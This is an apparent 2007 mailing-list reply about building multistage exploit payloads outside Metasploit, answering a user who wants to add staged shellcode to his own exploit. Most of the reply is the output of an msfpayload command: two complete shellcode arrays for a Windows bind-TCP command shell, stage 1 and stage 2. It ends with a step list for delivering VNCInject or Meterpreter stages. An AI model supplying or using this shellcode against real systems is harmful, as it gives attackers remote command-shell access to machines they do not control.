Building multistage payloaded exploits?

[hdm at metasploit.com (H D Moore)]

The multistaged stuff isn't simple to implement outside of Metasploit. 
There are intermediate stages and in some cases (Meterpreter) entire 
client-side libraries that need to be used. 

If you want to use a "simple" stager (2 pieces), then msfpayload will 
generate the correct blocks for you. For example:

$ msfpayload windows/shell/bind_tcp LPORT=12345 C
/*
 * windows/shell/bind_tcp - 201 bytes (stage 1)
 * http://www.metasploit.com
 * EXITFUNC=seh, LPORT=12345
 */
unsigned char buf[] =
"\xfc\x6a\xeb\x47\xe8\xf9\xff\xff\xff\x60\x31\xdb\x8b\x7d\x3c"
"\x8b\x7c\x3d\x78\x01\xef\x8b\x57\x20\x01\xea\x8b\x34\x9a\x01"
"\xee\x31\xc0\x99\xac\xc1\xca\x0d\x01\xc2\x84\xc0\x75\xf6\x43"
"\x66\x39\xca\x75\xe3\x4b\x8b\x4f\x24\x01\xe9\x66\x8b\x1c\x59"
"\x8b\x4f\x1c\x01\xe9\x03\x2c\x99\x89\x6c\x24\x1c\x61\xff\xe0"
"\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68"
"\x08\x5e\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\x66"
"\xb9\x72\x60\xff\xd6\x95\x53\x53\x53\x53\x53\x43\x53\x43\x53"
"\x89\xe7\x66\x81\xef\x08\x02\x57\x53\x66\xb9\xe7\xdf\xff\xd6"
"\x66\xb9\xa8\x6f\xff\xd6\x97\x66\x68\x30\x39\x66\x53\x89\xe1"
"\x6a\x10\x51\x57\x66\xb9\x80\x3b\xff\xd6\x53\x57\x66\xb9\x75"
"\x49\xff\xd6\x54\x54\x54\x57\x66\xb9\x32\x4c\xff\xd6\x97\x50"
"\x66\xb9\x33\xce\xff\xd6\x89\xe1\x50\xb4\x0c\x50\x51\x57\x51"
"\x66\xb9\xc0\x38\xff\xe6";

/*
 * windows/shell/bind_tcp - 474 bytes (stage 2)
 * http://www.metasploit.com
 */
unsigned char buf[] =
"\x68\x33\x32\x00\x00\x68\x57\x53\x32\x5f\x57\xfc\xe8\x4c\x00"
"\x00\x00\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x7c\x05\x78\x01"
"\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\xe3\x30\x49\x8b\x34\x8b"
"\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2"
"\xeb\xf4\x3b\x54\x24\x24\x75\xe3\x8b\x5f\x24\x01\xeb\x66\x8b"
"\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
"\xc2\x08\x00\x6a\x30\x59\x64\x8b\x31\x8b\x76\x0c\x8b\x76\x1c"
"\xad\x8b\x58\x08\x5e\x53\x68\x8e\x4e\x0e\xec\xff\xd6\x97\x53"
"\x56\x57\x8d\x44\x24\x10\x50\xff\xd7\x50\x50\x50\x68\xb6\x19"
"\x18\xe7\xff\xd6\x97\x68\xa4\x19\x70\xe9\xff\xd6\x95\x68\x08"
"\x92\xe2\xed\xff\xd6\x50\x57\x55\x83\xec\x10\x89\xe5\x89\xee"
"\x6a\x01\x6a\x00\x6a\x0c\x89\xe1\x6a\x00\x51\x56\xad\x56\x53"
"\x68\x80\x8f\x0c\x17\xff\x55\x20\x89\xc7\xff\xd0\x89\xe0\x6a"
"\x00\x50\x8d\x75\x08\x56\x8d\x75\x0c\x56\xff\xd7\x68\x43\x4d"
"\x44\x00\x89\xe2\x31\xc0\x8d\x7a\xac\x6a\x15\x59\xf3\xab\x83"
"\xec\x54\xc6\x42\xbc\x44\x66\xc7\x42\xe8\x01\x01\x8b\x75\x08"
"\x89\x72\xfc\x89\x72\xf8\x8b\x75\x04\x89\x72\xf4\x8d\x42\xbc"
"\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\x52\x51\x53\x68\x72"
"\xfe\xb3\x16\xff\x55\x20\xff\xd0\x31\xc0\xb4\x04\x96\x29\xf4"
"\x89\xe7\x6a\x64\x53\x68\xb0\x49\x2d\xdb\xff\x55\x20\xff\xd0"
"\x31\xc0\x50\x57\x50\x50\x50\xff\x75\x0c\x53\x68\x11\xc4\x07"
"\xb4\xff\x55\x20\xff\xd0\x85\xc0\x74\x74\x31\xc0\x3b\x07\x74"
"\x36\xe8\x77\x00\x00\x00\x50\x89\xe1\x50\x51\x56\x57\xff\x75"
"\x0c\x53\x68\x16\x65\xfa\x10\xff\x55\x20\xff\xd0\x85\xc0\x74"
"\x50\x31\xc0\x59\x39\xc8\x74\x11\x50\x51\x57\xff\x75\x28\xff"
"\x55\x10\x31\xc9\x39\xc8\x7c\x3a\xeb\xab\x89\xe0\xe8\x3f\x00"
"\x00\x00\x31\xc0\x50\x56\x57\xff\x75\x28\xff\x55\x14\x31\xc9"
"\x39\xc8\x7c\x86\x74\x1e\x51\x89\xe2\x51\x52\x50\x57\xff\x75"
"\x00\x53\x68\x1f\x79\x0a\xe8\xff\x55\x20\xff\xd0\x85\xc0\x74"
"\x05\x31\xc0\x59\xeb\xc8\x53\x68\xf0\x8a\x04\x5f\xff\x55\x20"
"\x31\xc9\x51\xff\xd0\x50\x54\x68\x7e\x66\x04\x80\xff\x75\x28"
"\xff\x55\x18\x85\xc0\x58\x75\xe0\xc3";

If you want to use VNCInject or Meterpreter, it looks like:

1) Send the basic stager (same as stage 1 above)
2) Send the intermediate stager (89 bytes)
3) Send the DLLInject stager (~2800 bytes)
4) Send the DLL itself (150k~+ bytes)
5) Talk to the payload socket and handle the DLL
6) Handle VNC or Meterpreter protocols

Use something like Wireshark to match up the exploit output (sending 
stage...) with the network traffic. If it was trivial, we would not have 
needed all this Ruby code to do it ;-)

-HD


On Monday 24 September 2007 16:12, scotty to hotty wrote:
> well since you'r on i was wondering if you can point me to an exploit
> with multistaged payloads? i need to learn how to do it in multiple
> stages instead of single.... i would like to find out how to do a
> multistage instead of single; heck i even tried finding out how using
> Paterva Maltego and it couldn't find anything i didnt already know....

and

On Saturday 22 September 2007 20:34, scotty to hotty wrote:
> can anyone help me out on how i could add some multistaged payload to
> my exploit? i only know how to use single stage shellcodes.... any help
> will be appreciated.